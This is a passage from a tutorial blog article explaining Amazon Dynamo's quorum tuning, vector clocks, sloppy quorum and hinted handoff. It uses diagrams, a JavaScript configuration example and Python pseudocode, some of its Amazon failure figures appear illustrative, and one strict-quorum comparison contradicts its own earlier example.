&lt;strong&gt;Performance&lt;/strong&gt;: Don't wait for the slowest node (only need 2 out of 3)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Real production numbers from the paper:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Amazon's shopping cart service during peak (holiday season):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Configuration: N=3, R=2, W=2&lt;/li&gt;
&lt;li&gt;Handled tens of millions of requests&lt;/li&gt;
&lt;li&gt;Over 3 million checkouts in a single day&lt;/li&gt;
&lt;li&gt;No downtime, even with server failures&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This tunable approach is what made Dynamo revolutionary. You're not stuck with one-size-fits-all—you tune it based on your actual business requirements.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Vector Clocks for Versioning
&lt;/h3&gt;

&lt;h4&gt;
  
  
  The Problem: Detecting Causality in Distributed Systems
&lt;/h4&gt;

&lt;p&gt;When multiple nodes can accept writes independently, you need to answer a critical question: &lt;strong&gt;Are these two versions of the same data related, or were they created concurrently?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why timestamps don't work:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Scenario: Two users edit the same shopping cart simultaneously

User 1 at 10:00:01.500 AM: Adds item A → Writes to Node X
User 2 at 10:00:01.501 AM: Adds item B → Writes to Node Y

Physical timestamp says: User 2's version is "newer"
Reality: These are concurrent! Both should be kept!

Problem: 
- Clocks on different servers are NEVER perfectly synchronized
- Clock skew can be seconds or even minutes
- Network delays are unpredictable
- Physical time doesn't capture causality
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What we really need to know:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Version A happened before Version B?     → B can overwrite A
Version A and B are concurrent?          → Keep both, merge later
Version A came from reading Version B?   → We can track this!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  The Solution: Vector Clocks
&lt;/h4&gt;

&lt;p&gt;A vector clock is a simple data structure: a list of &lt;code&gt;(node_id, counter)&lt;/code&gt; pairs that tracks which nodes have seen which versions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The rules:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;When a node writes data, it increments its own counter&lt;/li&gt;
&lt;li&gt;When a node reads data, it gets the vector clock&lt;/li&gt;
&lt;li&gt;When comparing two vector clocks:

&lt;ul&gt;
&lt;li&gt;If all counters in A ≤ counters in B → A is an ancestor of B (B is newer)&lt;/li&gt;
&lt;li&gt;If some counters in A &amp;gt; B and some B &amp;gt; A → A and B are concurrent (conflict!)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  Step-by-Step Example
&lt;/h4&gt;

&lt;p&gt;Let's trace a shopping cart through multiple updates:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4f1exuntzcchjyukf1e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4f1exuntzcchjyukf1e.png" alt="image" width="800" height="1526"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Breaking down the conflict:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;D3: [Sx:2, Sy:1]  vs  D4: [Sx:2, Sz:1]

Comparing:
- Sx: 2 == 2  ✓ (equal)
- Sy: 1 vs missing in D4  → D3 has something D4 doesn't
- Sz: missing in D3 vs 1  → D4 has something D3 doesn't

Conclusion: CONCURRENT! Neither is an ancestor of the other.
Both versions must be kept and merged.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Real-World Characteristics
&lt;/h4&gt;

&lt;p&gt;The Dynamo paper reports the following conflict distribution measured over 24 hours of Amazon's production shopping cart traffic. These numbers reflect Amazon's specific workload — high read/write ratio, mostly single-user sessions — and should not be assumed to generalize to all Dynamo deployments:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;99.94%    - Single version (no conflict)
0.00057%  - 2 versions
0.00047%  - 3 versions  
0.00009%  - 4 versions
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key insight&lt;/strong&gt;: Conflicts are RARE in practice! &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why conflicts happen:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Not usually from network failures&lt;/li&gt;
&lt;li&gt;Mostly from concurrent writers (often automated processes/bots)&lt;/li&gt;
&lt;li&gt;Human users rarely create conflicts because they're slow compared to network speed&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  The Size Problem
&lt;/h4&gt;

&lt;p&gt;Vector clocks can grow unbounded if many nodes coordinate writes. Dynamo's solution: &lt;strong&gt;truncate the oldest entries&lt;/strong&gt; once the clock exceeds a size threshold.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// When vector clock exceeds threshold (e.g., 10 entries)&lt;/span&gt;
&lt;span class="c1"&gt;// Remove the oldest entry based on wall-clock timestamp&lt;/span&gt;

&lt;span class="nx"&gt;vectorClock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;Sx&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="na"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;timestamp&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1609459200&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;Sy&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="na"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;timestamp&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1609459800&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;Sz&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="na"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;timestamp&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1609460400&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="c1"&gt;// ... 10 more entries&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// If size &amp;gt; 10, remove entry with oldest timestamp&lt;/span&gt;
&lt;span class="c1"&gt;// ⚠ Risk: Dropping an entry collapses causality information.&lt;/span&gt;
&lt;span class="c1"&gt;//   Two versions that were causally related may now appear&lt;/span&gt;
&lt;span class="c1"&gt;//   concurrent, forcing the application to resolve a conflict&lt;/span&gt;
&lt;span class="c1"&gt;//   that didn't actually exist. In practice, Amazon reports&lt;/span&gt;
&lt;span class="c1"&gt;//   this has not been a significant problem — but it is a&lt;/span&gt;
&lt;span class="c1"&gt;//   real theoretical risk in high-churn write environments&lt;/span&gt;
&lt;span class="c1"&gt;//   with many distinct coordinators.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4. Sloppy Quorum and Hinted Handoff
&lt;/h3&gt;

&lt;h4&gt;
  
  
  The Problem: Strict Quorums Kill Availability
&lt;/h4&gt;

&lt;p&gt;Traditional quorum systems are rigid and unforgiving.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Traditional strict quorum:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Your data is stored on nodes: A, B, C (preference list)
Write requirement: W = 2

Scenario: Node B is down for maintenance

Coordinator: "I need to write to 2 nodes from {A, B, C}"
Tries: A ✓, B ✗ (down), C ✓
Result: SUCCESS (got 2 out of 3)

Scenario: Nodes B AND C are down

Coordinator: "I need to write to 2 nodes from {A, B, C}"
Tries: A ✓, B ✗ (down), C ✗ (down)
Result: FAILURE (only got 1 out of 3)

Customer: "Why can't I add items to my cart?!" 😡
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The problem: &lt;strong&gt;Strict quorums require specific nodes&lt;/strong&gt;. If those specific nodes are down, the system becomes unavailable.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real scenario at Amazon:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Black Friday, 2:00 PM
- Datacenter 1: 20% of nodes being rebooted (rolling deployment)
- Datacenter 2: Network hiccup (1-2% packet loss)
- Traffic: 10x normal load

With strict quorum:
- 15% of write requests fail
- Customer support phones explode
- Revenue impact: Millions per hour
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  The Solution: Sloppy Quorum
&lt;/h4&gt;

&lt;p&gt;Dynamo relaxes the quorum requirement: &lt;strong&gt;"Write to the first N healthy nodes in the preference list, walking further down the ring if needed."&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Preference list for key K: A, B, C
But B is down...

Sloppy Quorum says:
"Don't give up! Walk further down the ring:
 A, B, C, D, E, F, ..."

Coordinator walks until N=3 healthy nodes are found: A, C, D
(D is a temporary substitute for B)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  How Hinted Handoff Works
&lt;/h4&gt;

&lt;p&gt;When a node temporarily substitutes for a failed node, it stores a "hint" with the data.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9yyza68cb39b33pj2sf4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9yyza68cb39b33pj2sf4.png" alt="image" width="800" height="791"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Detailed Hinted Handoff Process
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Detect failure and substitute&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;write_with_hinted_handoff&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;W&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;preference_list&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_preference_list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# [A, B, C]
&lt;/span&gt;
    &lt;span class="n"&gt;healthy_nodes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;is_healthy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="n"&gt;healthy_nodes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;is_hint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;False&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="c1"&gt;# If we don't have N healthy nodes, expand the list
&lt;/span&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;healthy_nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;extended_list&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_extended_preference_list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;extended_list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="nf"&gt;is_healthy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
                &lt;span class="n"&gt;healthy_nodes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;is_hint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;healthy_nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;

    &lt;span class="c1"&gt;# Write to first N healthy nodes
&lt;/span&gt;    &lt;span class="n"&gt;acks&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;is_hint&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;healthy_nodes&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;is_hint&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="c1"&gt;# Store with hint metadata
&lt;/span&gt;            &lt;span class="n"&gt;intended_node&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;find_intended_node&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write_hinted&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;hint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;intended_node&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;acks&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;acks&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="n"&gt;W&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;SUCCESS&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;FAILURE&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 2: Background hint transfer&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Runs periodically on each node (e.g., every 10 seconds)
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;transfer_hints&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;hints_db&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_hinted_replicas&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;hint&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;hints_db&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;intended_node&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;hint&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;intended_for&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;is_healthy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;intended_node&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;intended_node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hint&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;hint&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="n"&gt;hints_db&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;delete&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hint&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="nf"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Successfully transferred hint to &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;intended_node&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;except&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="nf"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Will retry later for &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;intended_node&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Why This Is Brilliant
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Durability maintained:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Even though B is down:
- We still have N=3 copies: A, C, D
- Data won't be lost even if another node fails
- System maintains durability guarantee
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Availability maximized:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client perspective:
- Write succeeds immediately
- No error message
- No retry needed
- Customer happy

Traditional quorum would have failed:
- Only 2 nodes available (A, C)
- Need 3 for N=3
- Write rejected
- Customer sees error
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Eventual consistency:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Timeline:
T=0:    Write succeeds (A, C, D with hint)
T=0-5min: B is down, but system works fine
T=5min: B recovers
T=5min+10sec: D detects B is back, transfers hint
T=5min+11sec: B has the data, D deletes hint

Result: Eventually, all correct replicas have the data
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Configuration Example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// High availability configuration&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;config&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="na"&gt;N&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Want 3 replicas&lt;/span&gt;
  &lt;span class="na"&gt;W&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Only need 2 ACKs to succeed&lt;/span&gt;
  &lt;span class="na"&gt;R&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Read from 2 nodes&lt;/span&gt;

  &lt;span class="c1"&gt;// Sloppy quorum allows expanding preference list&lt;/span&gt;
  &lt;span class="na"&gt;sloppy_quorum&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

  &lt;span class="c1"&gt;// How far to expand when looking for healthy nodes&lt;/span&gt;
  &lt;span class="na"&gt;max_extended_preference_list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

  &lt;span class="c1"&gt;// How often to check for hint transfers&lt;/span&gt;
  &lt;span class="na"&gt;hint_transfer_interval&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="nx"&gt;_seconds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

  &lt;span class="c1"&gt;// How long to keep trying to transfer hints&lt;/span&gt;
  &lt;span class="na"&gt;hint_retention&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;7&lt;/span&gt;&lt;span class="nx"&gt;_days&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Real-World Impact
&lt;/h4&gt;

&lt;p&gt;From Amazon's production experience:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;During normal operation:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Hinted handoff rarely triggered&lt;/li&gt;
&lt;li&gt;Most writes go to preferred nodes&lt;/li&gt;
&lt;li&gt;Hints database is mostly empty&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;During failures:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Scenario: 5% of nodes failing at any time (normal at Amazon's scale)

Without hinted handoff:
- Write success rate: 85%
- Customer impact: 15% of cart additions fail

With hinted handoff:
- Write success rate: 99.9%+
- Customer impact: Nearly zero
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;During datacenter failure:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Scenario: Entire datacenter unreachable (33% of nodes)

Without hinted handoff:
- Many keys would lose entire preference list
- Massive write failures
- System effectively down

With hinted handoff:
- Writes redirect to other datacenters
- Hints accumulate temporarily
- When datacenter recovers, hints transfer
- Zero customer-visible failures
